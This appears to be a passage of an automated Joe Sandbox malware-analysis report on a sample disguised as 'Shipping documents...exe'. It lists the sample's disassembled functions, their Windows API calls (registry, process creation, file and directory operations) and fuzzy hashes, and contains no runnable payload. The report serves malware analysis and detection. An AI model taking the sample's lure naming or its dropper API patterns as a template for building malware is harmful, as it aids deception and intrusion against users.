                                        • API String ID: 1486964399-0
                                        • Opcode ID: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                        • Instruction ID: 885267ae01076befc9d2550e8446c8d72b56611081dd9eb5b5e506e95b58587e
                                        • Opcode Fuzzy Hash: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                        • Instruction Fuzzy Hash: 04117071900318AADB10EFB9D90AA9EB6F8AF14354F20543FA401F72D1DBB88941CB59
                                        Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,00000011,00000002), ref: 00402602
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Enum$CloseValue
                                        • String ID:
                                        • API String ID: 397863658-0
                                        • Opcode ID: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                        • Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
                                        • Opcode Fuzzy Hash: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                        • Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D
                                        Function 0040202F Relevance: 3.1, APIs: 2, Instructions: 65memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                          • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                        • GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402045
                                        • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402064
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                        • String ID:
                                        • API String ID: 2520467145-0
                                        • Opcode ID: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                        • Instruction ID: 763ad8e8b63f2924b10e93d9a85bf0a11dc22f08f43b137c8aa05ca7cc66be5b
                                        • Opcode Fuzzy Hash: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                        • Instruction Fuzzy Hash: E7213871900208AFDB11DFE5C985EEEBBB4EF08354F11402AFA05B62D0D7759E51DB64
                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                        • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                        • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                        • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                        Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue
                                        • String ID:
                                        • API String ID: 2831762973-0
                                        • Opcode ID: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                        • Instruction ID: 0b96b132e490ce7cd6ce1444893b6524bba18796501a832965f154b7c78b6e42
                                        • Opcode Fuzzy Hash: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                        • Instruction Fuzzy Hash: 82F06832A04510ABDB00BBA89A4D9EE62A5AF54314F11443FE502B71C1CAFC5D02966D
                                        Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                        • GetLastError.KERNEL32 ref: 00405AFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                        • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                        • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                        • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                        Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                        • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3712363035-0
                                        • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                        • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                        • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                        • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                        Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                          • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                          • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                          • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                        • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                        • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                        • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                        Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 0040604B
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                        • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                        • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                        • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                        Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                        • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                        • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                        • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                        Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                        Function 0040173A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: PathSearch
                                        • String ID:
                                        • API String ID: 2203818243-0
                                        • Opcode ID: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
                                        • Instruction ID: 361b5ea4dce5ff5b5c0a009366d47470cb0510696b1a56dfa9010847a1c89de2
                                        • Opcode Fuzzy Hash: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
                                        • Instruction Fuzzy Hash: 21E08071204104ABE700DB64DD49EAE77BCDF5036CF20553BE511E60D1E7B45905971D
                                        Function 004063F2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674
                                        Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
